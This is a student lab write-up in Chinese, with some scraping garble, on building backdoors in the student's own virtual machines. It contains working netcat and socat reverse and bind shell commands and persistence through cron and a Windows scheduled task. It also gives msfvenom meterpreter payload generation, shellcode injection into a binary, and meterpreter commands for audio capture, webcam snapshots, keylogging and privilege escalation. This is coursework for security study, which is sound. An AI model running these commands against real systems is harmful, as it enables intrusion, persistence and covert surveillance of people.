1.使用netcat获取主机操做Shell,cron启动 (0.5分)html
2.使用socat获取主机操做Shell, 任务计划启动 (0.5分)linux
3.使用MSF meterpreter(或其余软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)git
4.使用MSF meterpreter(或其余软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)web
5.可选加份内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹链接Shell(1分)加份内容一并写入本实验报告shell
问题1:例举你能想到的一个后门进入到你系统中的可能方式?windows
问题2:例举你知道的后门如何启动起来(win及linux)的方式?网络
问题3:Meterpreter有哪些给你映像深入的功能?tcp
哇,既然提到这个问题,Meterpreter真的是细思极恐工具
问题4:如何发现本身有系统有没有被安装后门?学习
老实说,我作本次实验的杀毒软件都是关闭状态,由于在作第一遍实验时,注入到win10的socat.exe
和backdoor
程序很快就被发现了,因此,平时仍是打开杀毒软件比较好。
后门
的一个程序;坏人能够链接这个程序;经过该程序能够远程执行各类指令;概念上和木马
上有重叠那么,坏人一般如何经过后门进入系统呢?
说了这么多,咱们经常使用的后门程序有哪些呢,也就是咱们实验所使用的后门程序又有那些呢?
netcat
,一般用做nc
,可经过man netcat
或man nc
可查看说明。netcat.rar
,解压后就可使用了。下面咱们就来尝试一下如何使用netcat
和nc
吧。
在这里Windows系统我选择win7,Linux系统我选择win10。
首先,利用ipconfig
查看windows的主机IP,如图所示,个人主机IP为192.168.154.139
。
下载好ncat
,进入目录,按windows + R
组合键打开cmd.exe,输入ncat.exe -l -p 5203
来监听5203端口,如图所示。
此时,在Linux中,让Linux反弹链接win7,输入命令nc 192.168.154.139 -e /bin/sh
,如图所示。(该IP为win的IP)
接下来,咱们能够发现,咱们在windows端成功得到了Linux端的shell终端。
首先,咱们用ipconfig
得到Linux的ip地址,ip为192.168.154.143
。如图所示。
随后,Linux经过输入命令ns -l -p 5203
Windows反弹链接Linux,在Windows终端下的ncat目录,输入ncat.exe -e cmd.exe 192.168.154.143
,如图所示。
这时,咱们就会看到Linux终端下出现了Windows的终端。尝试一下,能够查看windows下的文件了。
首先,咱们先来了解一下nc传输数据的格式
:
nc -l 监听端口 > 要接收的文件名
nc 目的主机ip 目的端口
在Windows下发起监听,一样用ncat.exe -l -p 5203
,如图所示。
Kali Linux下链接经过命令nc 192.168.154.139 5203
链接到Window7。
创建链接后,就能够传输信息了,如图所示。
Windows和Linux下传输文件。
ncat
的加强版,使用格式是socat <option> <adress> <adress>
, 其中两个
socat
的windows下载路径为https://gitee.com/wildlinux/NetSec/attach_files。后门是一个程序,原本是有人编写一个程序,你们拿来用,可是有一些厉害的人,想编写一个平台能生成后门程序。这个平台,把后门的
等所有作成零件或可调整的参数。用的时候按须要的组合,就能够生成一个可执行文件。
常见的平台:
了解更多关于Meterpreter平台的内容,能够参考https://www.freebuf.com/articles/system/53818.html。
根据使用MSF生成的shellcode打造免杀playload,能够了解到,咱们能够用msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.154.139 lport=5203 -f c
(IP为windows7的IP)生成shellcode, 注入到可执行文件里,执行时能够攻击主机。
咱们本次实践就是利用Meterpreter平台
生成一个后门程序,而后攻击靶机。
在windows系统下,输入命令ncat.exe -l -p 5203
监听5203端口。
用crontab -e
完成一条定时任务。
打开文档后,在最后一行添加36 * * * * /bin/netcat 192.168.154.139 5203 -e /bin/sh
(windows的IP),意思是Kali Linux系统在每一个小时的第36分钟反向链接windows的5203端口:
当时间为21:36分时,监听成功,windows处出现了Kali Linux终端,如图所示(当我在终端输出命令的时候,时间已通过了1分钟,因此,截图上显示的时间是21:36分)。
本次实验我选的windows系统是win10系统。我查了一下个人win10主机的ip为 192.168.1.110
,如图所示。
在win10系统下,右击左下角windows的图标,选择计算机管理。
在任务计划程序
处建立任务,填写任务名称(这个名称是本身取的,个人是xyx)。
而后点击触发器
来新建一个触发器。开始任务
选择工做站锁定时
, 设置范围为全部用户
,而后点击肯定
,触发器就建立完了。
而后,在操做
->程序或脚本
中输入咱们以前下载的socat.exe
的路径,我直接把它放在了C盘----C:\用户\xiao\socat\socat.exe
,在添加参数一栏中添加tcp-listen:5203 exec:cmd.exe,pty,stderr
,这个命令的做用是将cmd.exe绑定到端口5203上,同时把cmd.exe的stderr重定向到stdout上
。
任务建立完毕后,迅速按Windows+L
锁定计算机,再次打开时,咱们能够查看到本身的任务,按右键,使其启动,状态变为正在运行
状态。
在Kali Linux环境下输入命令socat - tcp:192.168.1.110:5203
,这里的第一个参数表明-
表明标准的输入输出,第二个流链接到了windows10主机上的5203端口,此时,能够发现一个Kali Linux成功得到了一个cmd.exe,这个cmd.exe正是咱们windows10的终端。
在Kali Linux端,咱们输入msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.154.139 lport=5203 -f exe > 20165203.exe
(windows7的IP地址),将生成的shellcode注入到后门程序20165203_backdoor.exe
中。
在Windows中使用ncat.exe -lv 5203 > 20165203_backdoor.exe
查看其链接状态,如图所示状态为链接正常。
在Kali Linux中输入nc 192.168.154.143 < 20165203_backdoor.exe
(顺序变,箭头也要变),将20165203_backdoor.exe的后门程序注入到Windows7中。如图所示,收到Connection的链接,说明传输成功。
并查看了本身在ncat文件夹中注入的20165203_backdoor.exe
程序,保证大小为73K,若是为0K,说明传输未成功。
咱们在Kali Linux的终端上新打开一个终端,输入msfconsole
进入msf控制台。
而后,咱们输入use exploit/multi/handler
使用监听模块,设置payload
。
使用和生成后门程序相同的payload
(在第一步那里),输入命令set payload windows/meterpreter/reverse_tcp
。
使用set LHOST 192.168.154.139
(ip为Kali的IP)来设置payload的IP。
使用set LPORT 5203
来设置payload的端口号。
payload设置完成后,咱们来使用exploit
开始监听。
10.Kali Linux已经开始监听,此时,咱们回到Windows7终端,退出上一次的命令,执行20165203_back_door.exe
,再看Kali Linux的终端,咱们发现Linux得到了远程控制的Windows的shell。
接着上个内容,咱们可使用record_mic
截获一段音频,如图所示。
使用webcam_snap
可使用摄像头进行拍照。(由于在晚上作的实验,穿着睡衣,就不拍本人了,嘻嘻)
使用screenshot
能够截屏。
使用keyscan_start
指令能够记录下鼠标击键的过程,使用keyscan_dump
能够读取击键的记录
使用getuid
查看当前用户,使用getsystem
进行提权。
同窗们都推荐江智宇学姐的博客,经过学习学姐总结的博客,我了解到
在关于msfconcole的参数中:
-p 是指定用于特定的payload
然而,咱们须要的payload的功能是获取反链接靶机的shell,学姐的博客中给出了咱们须要的payload是linux/x64/shell_reverse_tcp
,
后面,咱们须要的是LHOST
和LPORT
,而后,咱们还须要-x
来指定咱们须要注入的文件,为/home/20165203/exp2/pwn2
.
-f
指定咱们文件的输出的格式,注入到pwn2中,pwn2是一个可执行文件,因此选elf格式。
因此,咱们的命令格式为
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.154.147 LPORT=5203 -x /home/20165203/exp2/pwn2 -f elf > pwn2_2
输入上述命令后,生成被注入shellcode的可执行文件pwn2_2,如图所示。
以后,咱们能够将pwn2_2注入到windows7中,调用msfconcole来监听,步骤与任务三相同了,作好了,就是如图所示格式啦。
我遇到的问题零零散散,多数都是由于本身的智障犯下的错误,不过,我感受有的问题仍是很值得供你们参考借鉴的。
Q1:使用webcam_snap
使用win7摄像头时,没法使用,提示141错误,如图所示。
A1:由于win7是在虚拟机中的,因此,咱们要从问题的根本下手。
首先,咱们想到多是win7虚拟机里压根儿就没有摄像头,由于想摄像头这样的USB设备原本就不可能同虚拟机和本机一块儿使用的,咱们能够尝试查看一下win7的设备管理器,如图进入win7里面的控制面板
,查看设备管理器
。咱们能够看到,里面根本就没有
图像设备
,天然就没有摄像头
了。
接下来,咱们在虚拟机中设置,把USB端口链接到虚拟机上来,如图所示,要选择链接主机
哦。
接下来,咱们在win7中刚才的设备管理器
中查看,就能发现有图像设备
了, 就能够“偷窥”了,哈哈哈哈。
Q2:昨晚刚作完本次实验,结果今天打开Kali虚拟机时出现了如图所示问题,妈呀,不会是搞实验搞出问题了吧。
A2:结果,我发现我昨晚电脑里的socat.exe
还在运行着,占用着虚拟机,因而,我索性打开电脑里的任务管理器
,将里面带有.vm
的进程所有关掉,而后再开启个人电脑管家
,杀了一遍毒,Kali得以打开,看来平时仍是要常打开杀毒软件。
此次实验真的颇有激情,仿佛本身是个黑客,一步一步,固然是本身攻击本身,哈哈,当达到摄像头拍摄的效果时,本身仿佛开启了新时代的大门,成就感颇升。
感谢这次咱们班课题负责人,也就是咱们寝室长本次实验的帮助了,咱们能够搞一个黑客组合了,哈哈。
不过,我以为能够在从此的实验中,尝试用其余常见的后门程序来练习,更加熟悉后门原理。